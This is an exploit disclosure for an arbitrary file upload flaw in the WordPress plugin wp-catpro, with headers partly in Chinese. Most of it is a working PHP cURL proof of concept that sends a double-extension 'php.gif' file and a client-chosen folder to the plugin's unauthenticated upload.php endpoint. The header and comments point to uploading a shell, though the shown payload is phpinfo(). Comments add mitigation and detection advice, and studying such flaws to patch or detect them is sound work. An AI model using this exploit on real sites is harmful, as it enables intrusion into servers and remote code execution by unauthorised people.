WordPress plugin wp-catpro - Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
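<?php
// Proof of concept for the wp-catpro upload handler described above.
//
// What it demonstrates: the handler trusts the client-supplied file name (a
// double extension that ends in .gif satisfies the "jpg/gif/png" allow-list
// quoted above) and a client-supplied destination 'folder'. The request sends
// no session cookie or nonce, so the endpoint appears to be reachable without
// authentication (inferred from this PoC, not verified against plugin source).
//
// Mitigation for site owners: validate the complete file name server-side
// against an allow-list (not just the last extension), ignore any
// client-supplied destination path, require an authenticated, nonce-protected
// request, and disable script execution inside wp-content/uploads.
//
// Detection: POST requests to .../wp-catpro/js/swfupload/js/upload.php whose
// Filedata file name carries a second extension, and newly written files under
// wp-content/uploads/catpro/ whose name contains a script extension.

$uploadfile = "zik.php.gif";

$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the legacy cURL file-upload form; kept exactly as the original used it.
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => "@$uploadfile",
    'folder'   => '/wp-content/uploads/catpro/',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// Echo the server's response body (empty if the request failed).
echo $postResult;

// The original had this line as bare text inside the PHP tags, which is a
// parse error; it is the author's note of where the uploaded file lands:
// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>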
<?php
// Body of the file the PoC uploads. phpinfo() is the conventional harmless
// marker used to prove that server-side code placed in the uploads directory
// is executed; it performs no further action on the host.
phpinfo(INFO_ALL);
?>